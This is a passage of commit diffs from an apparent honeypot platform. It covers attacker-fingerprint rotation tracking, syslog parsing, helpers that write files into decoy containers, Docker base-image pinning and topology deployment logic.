Called inline from the prober at each fingerprint emit site. Looks up
the last persisted hash for ``(attacker_uuid, port, probe_type)``;
when the new hash differs from the last one, emits a derived
``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
stamps the ``Attacker`` row's rotation telemetry.
This is a pure library — no daemon, no async loop. The prober is the
only producer. We just teach it to derive a second event on hash
flip without standing up another worker (DEBT-032).
"""
from __future__ import annotations
import uuid as _uuid
from dataclasses import dataclass
from datetime import datetime
from typing import Any, Callable, Literal
from sqlmodel import Session, select
from decnet.web.db.models import Attacker, AttackerFingerprintState
ProbeType = Literal["jarm", "hassh", "tcpfp"]
RotationKind = Literal[
"no_attacker_row", # caller raced ahead of correlator; skip silently
"first_sighting", # state row created, no prior hash
"unchanged", # same hash as last sighting
"rotated", # hash differs; event emitted, Attacker stamped
]
PublishFn = Callable[[str, dict[str, Any]], None]
SyslogFn = Callable[[str, dict[str, Any]], None]
@dataclass
class RotationOutcome:
    """Result returned by :func:`record_fingerprint`.

    Most callers discard it; it exists for tests and tracing.
    """

    # Which branch record_fingerprint took (one of the RotationKind values).
    kind: RotationKind
    # Previously stored hash, or None when there was nothing to compare with.
    old_hash: str | None
    # Hash passed in by the caller for this sighting.
    new_hash: str
    # Rotation counter of the state row (0 when no row existed beforehand).
    rotation_count: int
_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
def record_fingerprint(
    session: Session,
    *,
    attacker_ip: str,
    port: int,
    probe_type: ProbeType,
    new_hash: str,
    ts: datetime,
    publish_fn: PublishFn | None = None,
    syslog_fn: SyslogFn | None = None,
) -> RotationOutcome:
    """Upsert the fingerprint state row; on a hash change, emit and stamp.

    The attacker is looked up by ``attacker_ip``. Outcomes:

    * ``no_attacker_row`` — no ``Attacker`` row for the IP; nothing is
      written or emitted.
    * ``first_sighting`` — no state row for ``(attacker, port,
      probe_type)``; one is created and committed.
    * ``unchanged`` — stored hash equals *new_hash*; only ``last_seen`` is
      refreshed and committed.
    * ``rotated`` — stored hash differs; the state row and the attacker's
      rotation telemetry are updated, the derived event is handed to
      *publish_fn* and *syslog_fn* (when given), then everything is
      committed.

    Failure semantics on the ``rotated`` path: the emit callbacks run
    before the commit. If a callback or the commit raises, the session is
    rolled back and the exception re-raised, so no half-applied rotation
    stays pending on the session. An event that was already handed to a
    callback cannot be recalled; because the stored hash is then unchanged,
    a later call with the same *new_hash* detects the rotation again.

    Args:
        session: Open database session; this function commits on it.
        attacker_ip: Source IP used to resolve the ``Attacker`` row.
        port: Probed port.
        probe_type: Fingerprint family (``"jarm"``, ``"hassh"``, ``"tcpfp"``).
        new_hash: Fingerprint hash observed now.
        ts: Timestamp of the observation.
        publish_fn: Optional ``(event_type, payload)`` bus publisher.
        syslog_fn: Optional ``(event_type, payload)`` syslog emitter.

    Returns:
        A :class:`RotationOutcome` describing which branch was taken.
    """
    attacker = session.exec(
        select(Attacker).where(Attacker.ip == attacker_ip)
    ).first()
    if attacker is None:
        return RotationOutcome(
            kind="no_attacker_row",
            old_hash=None,
            new_hash=new_hash,
            rotation_count=0,
        )

    row = session.exec(
        select(AttackerFingerprintState).where(
            AttackerFingerprintState.attacker_uuid == attacker.uuid,
            AttackerFingerprintState.port == port,
            AttackerFingerprintState.probe_type == probe_type,
        )
    ).first()

    if row is None:
        session.add(AttackerFingerprintState(
            uuid=str(_uuid.uuid4()),
            attacker_uuid=attacker.uuid,
            port=port,
            probe_type=probe_type,
            last_hash=new_hash,
            last_seen=ts,
            rotation_count=0,
        ))
        session.commit()
        return RotationOutcome(
            kind="first_sighting",
            old_hash=None,
            new_hash=new_hash,
            rotation_count=0,
        )

    if row.last_hash == new_hash:
        # Read the values to report before committing.
        unchanged_hash = row.last_hash
        unchanged_count = row.rotation_count
        row.last_seen = ts
        session.add(row)
        session.commit()
        return RotationOutcome(
            kind="unchanged",
            old_hash=unchanged_hash,
            new_hash=new_hash,
            rotation_count=unchanged_count,
        )

    old_hash = row.last_hash
    row.last_hash = new_hash
    row.last_seen = ts
    row.rotation_count += 1
    session.add(row)
    attacker.rotation_count += 1
    attacker.last_rotation_at = ts
    session.add(attacker)
    rotation_count = row.rotation_count

    payload: dict[str, Any] = {
        "attacker_uuid": attacker.uuid,
        "attacker_ip": attacker_ip,
        "port": port,
        "probe_type": probe_type,
        "old_hash": old_hash,
        "new_hash": new_hash,
        "rotation_count": rotation_count,
        "ts": ts.isoformat(),
    }
    try:
        if publish_fn is not None:
            publish_fn(_ROTATED_EVENT_TYPE, payload)
        if syslog_fn is not None:
            syslog_fn(_ROTATED_EVENT_TYPE, payload)
        session.commit()
    except Exception:
        # Do not leave the mutated rows pending on the caller's session
        # where an unrelated later commit could persist them.
        session.rollback()
        raise

    return RotationOutcome(
        kind="rotated",
        old_hash=old_hash,
        new_hash=new_hash,
        rotation_count=rotation_count,
    )

View File

@@ -32,21 +32,6 @@ _RFC5424_RE = re.compile(
r"(.+)$", # 5: SD element + optional MSG
)
# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
# Docker-stdout collector envelope wraps the inner ``logger
# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
# real MSGID lives in the body. Mirrors the unwrap logic in
# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
# read the same on-wire format.
_INNER_RFC5424_RE = re.compile(
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
r"(\S+)\s+" # 2: inner HOSTNAME
r"(\S+)\s+" # 3: inner APP-NAME
r"\S+\s+" # PROCID (NIL or PID)
r"(\S+)\s+" # 4: inner MSGID
r"(.+)$", # 5: inner SD/MSG remainder
)
# Structured data block: [relay@55555 k="v" ...]
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
@@ -136,21 +121,6 @@ def parse_line(line: str) -> LogEvent | None:
ts_raw, decky, service, event_type, sd_rest = m.groups()
# Unwrap double-wrapped Docker-stdout envelopes around bash
# PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
# logic in ``decnet.collector.worker.parse_rfc5424``. Must run
# before the decky/service NIL-guard below — the OUTER decky is
# the docker host, the inner header carries the real source.
if event_type == "-" and sd_rest.startswith("-"):
body = sd_rest[1:].lstrip()
inner = _INNER_RFC5424_RE.match(body)
if inner is not None:
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
decky = i_host
service = i_app
event_type = i_msgid
sd_rest = i_rest
if decky == "-" or service == "-":
return None
@@ -167,19 +137,6 @@ def parse_line(line: str) -> LogEvent | None:
msg = tail.group(1).strip() if tail else ""
attacker_ip = _extract_attacker_ip(fields, msg)
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
# Without this rewrite they're invisible to the behavioral profiler, which
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
# invocation uses --msgid command, so we must also handle the non-nil case.
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
event_type = "command"
head, sep, cmd_rest = msg[4:].partition("cmd=")
for k, v in re.findall(r'(\w+)=(\S+)', head):
fields.setdefault(k, v)
if sep:
fields.setdefault("command", cmd_rest)
# Mutator-emitted transitions arrive on the same ingest stream but
# belong in the substrate-state index, not the per-IP attacker one.
kind: EventKind = (

View File

@@ -70,7 +70,7 @@ async def run_reuse_loop(
wake_tasks.append(asyncio.create_task(
_run_control_listener_signal(bus, "reuse-correlator"),
))
except Exception as exc:
except Exception as exc: # noqa: BLE001
log.warning(
"reuse correlator: bus unavailable, running in poll-only mode: %s",
exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
results = await engine.correlate_credential_reuse(
repo, min_targets=min_targets,
)
except Exception:
except Exception: # noqa: BLE001
log.exception("reuse correlator: tick failed")
results = []
@@ -120,11 +120,11 @@ async def run_reuse_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
wake.set()
except asyncio.CancelledError:
raise
except Exception as exc:
except Exception as exc: # noqa: BLE001
log.warning(
"reuse correlator: subscriber for %s died (%s); falling back to poll",
pattern, exc,

View File

@@ -1,39 +0,0 @@
"""Shared primitives for writing/deleting files inside running deckies.
The canary planter and the orchestrator SSH driver both need to drop
bytes into a decky container's filesystem, then sometimes unlink them.
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
before this module existed.
Public API:
* :func:`write_file_to_container` — write bytes at a path, set mode,
optionally backdate mtime.
* :func:`delete_file_from_container` — best-effort ``rm -f``.
* :func:`resolve_topology_container` — pick the right docker container
for a MazeNET decky based on its services list.
* :func:`resolve_decky_container` — async helper that takes
``(decky_name, topology_id?)``, hydrates the topology when needed,
and returns the docker container name.
Container resolution conventions are documented in
:mod:`decnet.topology.compose`; we mirror them here without taking
a runtime dependency on the compose generator.
"""
from __future__ import annotations
from .resolve import (
resolve_decky_container,
resolve_topology_container,
)
from .write import (
delete_file_from_container,
write_file_to_container,
)
__all__ = [
"delete_file_from_container",
"resolve_decky_container",
"resolve_topology_container",
"write_file_to_container",
]

View File

@@ -1,72 +0,0 @@
"""Decky-name → docker container name resolution.
Two scopes:
* **Fleet**: every fleet decky has a ``ssh`` service container named
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
target it because it carries the most realistic filesystem layout.
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
decky exposes the ssh service; otherwise the decky's base container
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
:func:`decnet.topology.compose._container_name`).
Keeping resolution centralised here means new ``docker exec`` callers
(file drops, future bulk planters, etc.) never need to learn the
naming conventions — they just call :func:`resolve_decky_container`.
"""
from __future__ import annotations
from typing import Any, Iterable, Optional
_SSH_CONTAINER_SUFFIX = "-ssh"


def resolve_topology_container(
    topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
    """Return the docker container name for a MazeNET decky.

    When ``"ssh"`` is among *services* the result is ``<decky_name>-ssh``;
    otherwise it is ``decnet_t_<first 8 chars of topology_id>_<decky_name>``.
    Pure function — no I/O.
    """
    service_names = set(services)
    if "ssh" not in service_names:
        return f"decnet_t_{topology_id[:8]}_{decky_name}"
    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
async def resolve_decky_container(
    repo: Any,
    decky_name: str,
    *,
    topology_id: Optional[str] = None,
) -> str:
    """Resolve the docker container name for *decky_name*.

    Fleet path (``topology_id is None``): ``<decky_name>-ssh`` is returned
    without touching *repo*; the decky is not checked for existence.

    Topology path: the topology is hydrated through
    ``decnet.topology.persistence.hydrate``. The first decky whose name
    (``decky_config["name"]``, falling back to the entry's own ``name``)
    equals *decky_name* is used, and its services list is passed to
    :func:`resolve_topology_container`.

    Raises:
        LookupError: ``topology_id`` is set but the topology is missing,
            or it contains no decky with that name.
    """
    if topology_id is None:
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"

    from decnet.topology.persistence import hydrate

    topology = await hydrate(repo, topology_id)
    if topology is None:
        raise LookupError(f"topology {topology_id!r} not found")

    for entry in topology["deckies"]:
        config = entry.get("decky_config") or {}
        entry_name = config.get("name") or entry.get("name")
        if entry_name != decky_name:
            continue
        return resolve_topology_container(
            topology_id, decky_name, entry.get("services") or [],
        )

    raise LookupError(
        f"decky {decky_name!r} is not in topology {topology_id!r}"
    )

View File

@@ -1,124 +0,0 @@
"""``docker exec``-driven file write/delete inside a decky container.
The write path streams a base64-encoded payload over stdin to
``base64 -d`` inside the container, so binary content of any size up
to docker's stream limits is safe — interpolating bytes into argv
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
"""
from __future__ import annotations
import asyncio
import base64
import shlex
from datetime import datetime, timezone
from typing import Optional
from decnet.logging import get_logger
log = get_logger("decky_io.write")
_DOCKER = "docker"
_DEFAULT_TIMEOUT = 8.0
def _dirname(path: str) -> str:
    """Return everything before the last ``/`` of *path*.

    ``"/"`` is returned when *path* contains no slash or when its only
    slash is the leading one.
    """
    head, slash, _leaf = path.rpartition("/")
    if slash and head:
        return head
    return "/"
async def _run(
    argv: list[str],
    *,
    stdin_bytes: Optional[bytes] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
    """Run *argv* as a subprocess and collect its result.

    Args:
        argv: Program and arguments; executed without a shell.
        stdin_bytes: Bytes written to the child's stdin. With ``None`` no
            stdin pipe is attached.
        timeout: Seconds to wait for the process to finish.

    Returns:
        ``(returncode, stdout, stderr)`` with both streams decoded as
        UTF-8 (undecodable bytes replaced). Special return codes:
        ``127`` when the executable was not found, ``124`` when the
        timeout elapsed (stderr is then the literal ``"timeout"``), and
        ``-1`` if the process reports no return code.
    """
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=timeout,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            # Process already exited between the timeout and the kill.
            pass
        # Reap the child so it does not linger as a zombie and its
        # transport is released.
        await proc.wait()
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
async def write_file_to_container(
    container: str,
    path: str,
    content: bytes,
    *,
    mode: int = 0o644,
    mtime: Optional[datetime] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Write *content* to *path* inside *container* via ``docker exec``.

    The payload is base64-encoded and streamed over stdin to ``base64 -d``
    in the container. The shell steps, joined with ``&&``, are: create the
    parent directory, write the file, ``chmod`` it to *mode* and — only
    when *mtime* is given — ``touch -d`` it to that instant converted to
    UTC and formatted as ``YYYY-MM-DD HH:MM:SS UTC``.

    Returns:
        ``(True, None)`` on exit code 0. Otherwise ``(False, error)`` where
        ``error`` is the stripped stderr truncated to 256 characters, or
        ``"rc=<n>"`` when stderr is empty. An empty *path* yields
        ``(False, "empty path")`` without running anything.
    """
    if not path:
        return False, "empty path"

    payload = base64.b64encode(content)
    quoted_path = shlex.quote(path)
    steps = [
        f"mkdir -p {shlex.quote(_dirname(path))}",
        f"base64 -d > {quoted_path}",
        f"chmod {mode:o} {quoted_path}",
    ]
    if mtime is not None:
        stamp = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        steps.append(f"touch -d {shlex.quote(stamp)} {quoted_path}")

    exit_code, _out, err_text = await _run(
        [_DOCKER, "exec", "-i", container, "sh", "-c", " && ".join(steps)],
        stdin_bytes=payload,
        timeout=timeout,
    )
    if exit_code == 0:
        return True, None

    message = err_text.strip()[:256] or f"rc={exit_code}"
    log.warning(
        "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
        container, path, exit_code, err_text[:120],
    )
    return False, message
async def delete_file_from_container(
    container: str,
    path: str,
    *,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Run ``rm -f`` on *path* inside *container* via ``docker exec``.

    Returns:
        ``(True, None)`` when the command exits with 0, otherwise
        ``(False, error)`` where ``error`` is the stripped stderr
        truncated to 256 characters, or ``"rc=<n>"`` if stderr is empty.
    """
    command = [
        _DOCKER, "exec", container, "sh", "-c", f"rm -f {shlex.quote(path)}",
    ]
    exit_code, _out, err_text = await _run(command, timeout=timeout)
    if exit_code != 0:
        return False, err_text.strip()[:256] or f"rc={exit_code}"
    return True, None

View File

@@ -18,86 +18,69 @@ class DistroProfile:
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
# Base images are pinned by digest (sha256) to make `docker pull`
# reproducible — a registry-side rebuild of "debian:bookworm-slim"
# can't silently swap content under us. The :tag is kept for human
# readability; the @sha256 is what Docker actually resolves.
# Refresh procedure: `docker pull <tag>` then `docker inspect
# --format '{{index .RepoDigests 0}}' <tag>`. Last refreshed 2026-05-03.
_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
_UBUNTU_22_04 = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
_UBUNTU_20_04 = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
_ROCKY_9 = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
_CENTOS_7 = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
_ALPINE_3_19 = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
_FEDORA_39 = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
_KALI_ROLLING = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
_ARCH_LATEST = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
DISTROS: dict[str, DistroProfile] = {
"debian": DistroProfile(
slug="debian",
image=_DEBIAN_BOOKWORM,
image="debian:bookworm-slim",
display_name="Debian 12 (Bookworm)",
hostname_style="generic",
build_base=_DEBIAN_BOOKWORM,
build_base="debian:bookworm-slim",
),
"ubuntu22": DistroProfile(
slug="ubuntu22",
image=_UBUNTU_22_04,
image="ubuntu:22.04",
display_name="Ubuntu 22.04 LTS (Jammy)",
hostname_style="generic",
build_base=_UBUNTU_22_04,
build_base="ubuntu:22.04",
),
"ubuntu20": DistroProfile(
slug="ubuntu20",
image=_UBUNTU_20_04,
image="ubuntu:20.04",
display_name="Ubuntu 20.04 LTS (Focal)",
hostname_style="generic",
build_base=_UBUNTU_20_04,
build_base="ubuntu:20.04",
),
"rocky9": DistroProfile(
slug="rocky9",
image=_ROCKY_9,
image="rockylinux:9-minimal",
display_name="Rocky Linux 9",
hostname_style="rhel",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
"centos7": DistroProfile(
slug="centos7",
image=_CENTOS_7,
image="centos:7",
display_name="CentOS 7",
hostname_style="rhel",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
"alpine": DistroProfile(
slug="alpine",
image=_ALPINE_3_19,
image="alpine:3.19",
display_name="Alpine Linux 3.19",
hostname_style="minimal",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
"fedora": DistroProfile(
slug="fedora",
image=_FEDORA_39,
image="fedora:39",
display_name="Fedora 39",
hostname_style="rhel",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
"kali": DistroProfile(
slug="kali",
image=_KALI_ROLLING,
image="kalilinux/kali-rolling",
display_name="Kali Linux (Rolling)",
hostname_style="rolling",
build_base=_KALI_ROLLING, # Debian-based, apt-get compatible
build_base="kalilinux/kali-rolling", # Debian-based, apt-get compatible
),
"arch": DistroProfile(
slug="arch",
image=_ARCH_LATEST,
image="archlinux:latest",
display_name="Arch Linux",
hostname_style="rolling",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
}

View File

@@ -3,7 +3,6 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
"""
import asyncio
import json
import shutil
import subprocess # nosec B404
import time
@@ -58,8 +57,6 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
_NTLMSSP_SERVICES = {"smb", "rdp"}
_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
_CADDY_SERVICES = {"http", "https"}
def _sync_logging_helper(config: DecnetConfig) -> None:
@@ -166,104 +163,6 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
shutil.copy2(src, dest)
def _chown_tree(dest: Path, owner_ref: Path) -> None:
"""Recursively set uid/gid of *dest* to match *owner_ref*. No-op if not root."""
import os
if os.geteuid() != 0:
return
st = owner_ref.stat()
uid, gid = st.st_uid, st.st_gid
targets = [dest] + list(dest.rglob("*")) if dest.is_dir() else [dest]
for p in targets:
try:
os.lchown(p, uid, gid)
except OSError:
pass
def _sync_caddy_modules(config: DecnetConfig) -> None:
    """Mirror the canonical ``_caddy_modules/`` tree into http/https build contexts.

    For every distinct build context of a service named in
    ``_CADDY_SERVICES`` across the configured deckies, the children of the
    canonical directory are copied into ``<context>/_caddy_modules``:
    directories are replaced wholesale, files are copied only when missing
    or different in content. Copied entries get their ownership aligned
    with the canonical directory via ``_chown_tree``.

    Returns without doing anything when the canonical directory is absent.
    """
    from decnet.services.registry import get_service

    source_root = _CANONICAL_CADDY_MODULES_DIR
    if not source_root.is_dir():
        return

    handled: set[Path] = set()
    wanted = (
        name
        for decky in config.deckies
        for name in decky.services
        if name in _CADDY_SERVICES
    )
    for name in wanted:
        service = get_service(name)
        if service is None:
            continue
        context = service.dockerfile_context()
        if context is None or context in handled:
            continue
        handled.add(context)

        target_root = context / "_caddy_modules"
        target_root.mkdir(exist_ok=True)
        for item in source_root.iterdir():
            target = target_root / item.name
            if item.is_dir():
                # Replace the whole subtree so removed files do not linger.
                if target.exists():
                    shutil.rmtree(target)
                shutil.copytree(item, target)
                _chown_tree(target, source_root)
                continue
            if target.exists() and target.read_bytes() == item.read_bytes():
                continue
            shutil.copy2(item, target)
            _chown_tree(target, source_root)
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
Used for post-deploy verification: ``compose up -d`` returns 0 the
moment containers are *started*, but a service that crashes on boot
(port collision, bad image, missing dependency) only shows up here.
Returns an empty list when compose has nothing to report (and on
parse failure — caller treats that as 'unverifiable, don't gate').
"""
cmd = [
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
"ps", "--all", "--format", "json",
]
try:
result = subprocess.run( # nosec B603
cmd, capture_output=True, text=True, check=False,
)
except FileNotFoundError:
return []
if result.returncode != 0:
return []
rows: list[dict[str, object]] = []
# ``docker compose ps --format json`` emits one JSON object per line
# (newline-delimited), not a JSON array. Parse line-by-line so a
# single bad line doesn't poison the whole result.
for line in (result.stdout or "").splitlines():
line = line.strip()
if not line:
continue
try:
obj = json.loads(line)
except json.JSONDecodeError:
continue
if isinstance(obj, dict):
rows.append(obj)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, dict):
rows.append(item)
return rows
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
import os
# -p decnet pins the compose project name. Without it, docker compose
@@ -494,8 +393,6 @@ def _compose_with_retry(
console.print(f"[red]{result.stderr.strip()}[/]")
log.error("docker compose %s failed after %d attempts: %s",
" ".join(args), retries, result.stderr.strip())
if last_exc is None: # pragma: no cover — retries=0 is not a supported call
raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
raise last_exc
@@ -665,7 +562,6 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
_sync_sessrec_sources(config)
_sync_auth_helper_sources(config)
_sync_ntlmssp_sources(config)
_sync_caddy_modules(config)
compose_path = write_compose(config, COMPOSE_FILE)
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
@@ -1055,84 +951,8 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
)
raise
# Post-deploy verification: ``compose up -d`` returns 0 the moment
# containers are *started*, so a service that crashes on boot
# (port bind failure, bad image, missing dependency) leaves the
# topology row sitting at ACTIVE while half the substrate is dead.
# Sample compose ps once and downgrade to DEGRADED if any expected
# container isn't running — operators see real state instead of an
# optimistic flag.
ps_rows = await anyio.to_thread.run_sync(
lambda: _compose_ps(compose_path),
)
bad: list[str] = []
# Build the per-decky state map. The base container's compose
# service name == decky name, which is what we cache on the
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
# don't gate the decky's state — service-level failures are visible
# in compose ps separately and don't downgrade the decky as a whole.
decky_state_by_name: dict[str, str] = {}
for row in ps_rows:
state = str(row.get("State", "")).lower()
service_name = str(row.get("Service") or "")
if service_name and "-" not in service_name:
# Plain decky base; cache its docker state.
decky_state_by_name[service_name] = state or "unknown"
if state and state != "running":
name = str(row.get("Name") or row.get("Service") or "?")
exit_code = row.get("ExitCode")
bad.append(
f"{name}={state}"
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
)
# Reconcile each TopologyDecky.state from compose's view. Without
# this, the row stays at the default 'pending' forever and the
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
# actually up.
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
ds = decky_state_by_name.get(decky_name, "unknown")
new_state = "running" if ds == "running" else "failed"
try:
await repo.update_topology_decky(
decky["uuid"], {"state": new_state},
)
except Exception as exc: # noqa: BLE001
log.warning(
"post-deploy state reconcile failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
if bad:
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
)
await transition_status(
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
)
log.warning(
"topology %s deployed but %d container(s) unhealthy: %s",
topology_id, len(bad), reason,
)
else:
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Best-effort canary baseline seed across every decky in the
# topology. Same resilience contract as the fleet path: failures
# surface as state=failed token rows, never abort the deploy.
try:
from decnet.canary import planter as _canary_planter
await _canary_planter.seed_baseline_topology(repo, topology_id)
except Exception as exc: # noqa: BLE001
log.warning(
"canary baseline seed failed (best-effort) topology=%s err=%s",
topology_id, exc,
)
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
@_traced("engine.teardown_topology")

View File

@@ -1,673 +0,0 @@
"""Add/remove a single service on a deployed decky without full redeploy.
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
supports per-service targeting (``up --no-deps -d <svc>``,
``stop <svc>``, ``rm -f <svc>``). What was missing was the
orchestration: regenerate the compose file (so future redeploys reflect
the change), persist the new ``services`` list, and run the targeted
compose command.
Two scopes:
* **Topology** — source of truth is the ``topology_deckies`` table; the
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
* **Fleet** — source of truth is ``decnet-state.json`` (with the
``fleet_deckies`` table mirroring it); compose is the unihost
``decnet-compose.yml``.
Both publish ``decky.<name>.service.added`` /
``decky.<name>.service.removed`` on the bus. The new topic constants
are documented in ``wiki-checkout/Service-Bus.md``.
"""
from __future__ import annotations
import subprocess # nosec B404
from pathlib import Path
from typing import Any, Literal, Optional
import anyio
from decnet.bus import topics
from decnet.logging import get_logger
from decnet.services.base import BaseService
from decnet.services.registry import get_service
from decnet.topology.persistence import hydrate
from decnet.web.db.repository import BaseRepository
# Heavy imports (composer/deployer pull in decnet.network → docker) are
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
# pattern in decnet.canary.planter for the same reason.
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
    """Forward a ``docker compose`` invocation to the deployer's ``_compose``.

    This module-level seam exists so tests can
    ``monkeypatch.setattr(services_live, '_compose', ...)``. The deployer is
    imported at call time, not at module import, to keep this module's
    import graph light.

    ``compose_file`` is only forwarded when the caller supplied one; when it
    is ``None`` the deployer's own default applies.
    """
    from decnet.engine.deployer import _compose as deployer_compose

    forwarded: dict = {"env": env}
    if compose_file is not None:
        forwarded["compose_file"] = compose_file
    deployer_compose(*args, **forwarded)
def _topology_compose_path(topology_id: str) -> Path:
    """Return the deployer's compose-file path for *topology_id*.

    Thin call-time delegate; the deployer import is deferred on purpose.
    """
    from decnet.engine.deployer import _topology_compose_path as resolve_path

    compose_path = resolve_path(topology_id)
    return compose_path
def _write_topology_compose(hydrated, path: Path) -> Path:
    """Render *hydrated* to *path* via ``decnet.topology.compose`` (lazy import).

    Returns whatever ``write_topology_compose`` returns.
    """
    from decnet.topology.compose import write_topology_compose as render

    written = render(hydrated, path)
    return written
def _load_state():
    """Return ``decnet.config.load_state()`` (imported lazily at call time).

    Callers in this module treat a ``None`` result as "no fleet state".
    """
    from decnet.config import load_state as read_state

    loaded = read_state()
    return loaded
def _save_state(config, compose_path) -> None:
    """Persist fleet state through ``decnet.config.save_state`` (lazy import)."""
    from decnet.config import save_state as store_state

    store_state(config, compose_path)
def _write_compose(config, compose_path) -> None:
